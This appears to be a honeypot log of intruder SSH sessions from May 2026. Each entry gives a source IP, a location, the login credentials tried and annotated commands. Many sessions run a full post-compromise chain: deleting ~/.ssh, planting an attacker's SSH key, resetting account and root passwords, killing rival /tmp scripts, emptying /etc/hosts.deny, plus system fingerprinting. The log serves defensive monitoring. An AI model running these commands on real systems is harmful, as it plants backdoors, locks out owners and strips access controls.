$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nSiORtAy8jQkn\nSiORtAy8jQkn"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nSiORtAy8jQkn\nSiORtAy8jQkn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tulip_root_10 (20.123.146.93) β€” Amsterdam, Netherlands Β· 2 sessions Β· 40 cmds
2026-05-20 13:25 EDT Β· as sato/123456, xiaofang/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nSOxH5Taj9BEs\nSOxH5Taj9BEs"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nSOxH5Taj9BEs\nSOxH5Taj9BEs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\nUtyCUXGukGb1\nUtyCUXGukGb1"|passwd|bash
$ echo "123456\nUtyCUXGukGb1\nUtyCUXGukGb1\n"|passwd
🎭 gouda_root_6 (4.210.186.201) β€” Amsterdam, Netherlands Β· 1 session Β· 20 cmds
2026-05-20 13:32 EDT Β· as hua/hua123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "hua123\nQfjfUk6ktEen\nQfjfUk6ktEen"|passwd|bash
$ Enter new UNIX password:
$ echo "hua123\nQfjfUk6ktEen\nQfjfUk6ktEen\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bike_root_11 (20.123.146.92) β€” Amsterdam, Netherlands Β· 1 session Β· 19 cmds
2026-05-20 13:30 EDT Β· as root/dalian
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:qFqlFrttUX3L"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bike_root_12 (20.123.146.95) β€” Amsterdam, Netherlands Β· 1 session Β· 19 cmds
2026-05-20 13:22 EDT Β· as root/rengongzhineng
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:iLaq3ShZJSRE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 pretzel_root_17 (62.171.156.34) β€” Frankfurt am Main, Germany Β· 1 session Β· 1 cmd
2026-05-20 13:22 EDT Β· as admin/test2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 spice_root_11 (103.108.117.94) β€” Chennai, India Β· 1 session Β· 19 cmds
2026-05-20 13:17 EDT Β· as root/ops001
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:caRRvS897eyI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_4 (209.141.41.212) β€” Las Vegas, United States Β· 1 session Β· 20 cmds
2026-05-20 13:14 EDT Β· as xiaofang/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nAbV3FGFMB1Y2\nAbV3FGFMB1Y2"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nAbV3FGFMB1Y2\nAbV3FGFMB1Y2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 baguette_root_11 (173.249.39.48) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-20 12:49 EDT Β· as jimster/password1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_40 (76.12.128.249) β€” Houston, United States Β· 1 session Β· 1 cmd
2026-05-20 12:17 EDT Β· as jimster/Jimster$2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_76 (46.250.234.192) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-20 12:11 EDT Β· as root/password123!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_92 (125.212.243.14) β€” Ho Chi Minh City, Vietnam Β· 1 session Β· 1 cmd
2026-05-20 11:51 EDT Β· as admin/p@ssw0rd2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 spice_root_12 (160.250.204.33) β€” Gurugram, India Β· 1 session Β· 1 cmd
2026-05-20 11:14 EDT Β· as root/2025#Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 samba_root_7 (186.236.237.105) β€” Barbacena, Brazil Β· 1 session Β· 1 cmd
2026-05-20 11:09 EDT Β· as jimster/admin2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_94 (42.96.43.93) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-05-20 11:05 EDT Β· as root/admin2025@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 hanbok_root_4 (59.6.41.4) β€” Seoul, South Korea Β· 1 session Β· 1 cmd
2026-05-20 10:59 EDT Β· as jimster/admin2025#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 monsoon_root_14 (59.92.50.157) β€” Chennai, India Β· 1 session Β· 1 cmd
2026-05-20 10:54 EDT Β· as jimster/Jimster@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 baguette_root_12 (37.60.239.163) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-20 10:40 EDT Β· as root/Admin2026!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 baguette_root_13 (146.59.229.70) β€” Gravelines, France Β· 1 session Β· 1 cmd
2026-05-20 10:37 EDT Β· as jimster/2025.Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_93 (57.128.246.209) β€” Warsaw, Poland Β· 1 session Β· 1 cmd
2026-05-20 10:27 EDT Β· as admin/P@ssword2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 chateau_root_12 (173.249.41.141) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-20 09:57 EDT Β· as root/Welcome@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cipher_root_74 (180.93.3.95) β€” QuαΊ­n Bα»‘n, Vietnam Β· 1 session Β· 1 cmd
2026-05-20 09:41 EDT Β· as admin/Jimster$1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_84 (103.90.67.84) β€” Balai Pungut, Indonesia Β· 1 session Β· 1 cmd
2026-05-20 09:17 EDT Β· as root/admin!2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 liberty_root_30 (72.167.34.120) β€” Tempe, United States Β· 1 session Β· 1 cmd
2026-05-20 08:19 EDT Β· as root/Jimster!1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_41 (159.198.77.184) β€” Denver, United States Β· 1 session Β· 1 cmd
2026-05-20 08:15 EDT Β· as jimster/Admin2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 liberty_root_31 (203.161.33.202) β€” Phoenix, United States Β· 1 session Β· 1 cmd
2026-05-20 07:31 EDT Β· as jimster/$2026Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 liberty_root_32 (74.48.78.242) β€” Los Angeles, United States Β· 1 session Β· 1 cmd
2026-05-20 07:24 EDT Β· as admin/admin2026#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_24 (165.154.6.127) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 59 cmds
2026-05-10 16:46 EDT Β· as admin/123123a, root/Password.123, service/1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "1234\np6q9kk3DE9ww\np6q9kk3DE9ww"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1234\np6q9kk3DE9ww\np6q9kk3DE9ww\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:zCMd0fFvNvcC"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "123123a\n1omeoWUnSfqk\n1omeoWUnSfqk"|passwd|bash
$ echo "123123a\n1omeoWUnSfqk\n1omeoWUnSfqk\n"|passwd
🎭 chateau_root_13 (5.189.154.44) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-20 06:57 EDT Β· as jimster/2026$Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 windmill_root_9 (50.7.136.106) β€” Halfweg, The Netherlands Β· 1 session Β· 1 cmd
2026-05-20 06:38 EDT Β· as root/LHY@123.com!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 autobahn_root_15 (178.27.90.142) β€” Bad Kreuznach, Germany Β· 1 session Β· 19 cmds
2026-05-20 06:36 EDT Β· as root/Password.123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:uHwxhk2PlWqe"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 blitz_root_13 (81.169.241.235) β€” Berlin, Germany Β· 1 session Β· 1 cmd
2026-05-20 05:42 EDT Β· as jimster/P@ssword123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_95 (103.67.80.61) β€” Cicurug, Indonesia Β· 2 sessions Β· 39 cmds
2026-05-20 04:57 EDT Β· as claude/claude, root/griffin
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "claude\nzFSwCi0Q0aDC\nzFSwCi0Q0aDC"|passwd|bash
$ Enter new UNIX password:
$ echo "claude\nzFSwCi0Q0aDC\nzFSwCi0Q0aDC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:RZdJUaN4Pjzu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_root_86 (92.115.19.173) β€” Nisporeni, Moldova Β· 1 session Β· 1 cmd
2026-05-20 05:07 EDT Β· as root/Admin!2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 beefeater_root_4 (37.143.61.248) β€” City of London, United Kingdom Β· 2 sessions Β· 39 cmds
2026-05-20 04:44 EDT Β· as claude/claude, root/admin1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "claude\npLysDjIyUqxG\npLysDjIyUqxG"|passwd|bash
$ Enter new UNIX password:
$ echo "claude\npLysDjIyUqxG\npLysDjIyUqxG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:LVRwOzkVRkh0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 liberty_root_33 (146.190.126.213) β€” Santa Clara, United States Β· 1 session Β· 1 cmd
2026-05-20 05:02 EDT Β· as jimster/Admin@2026
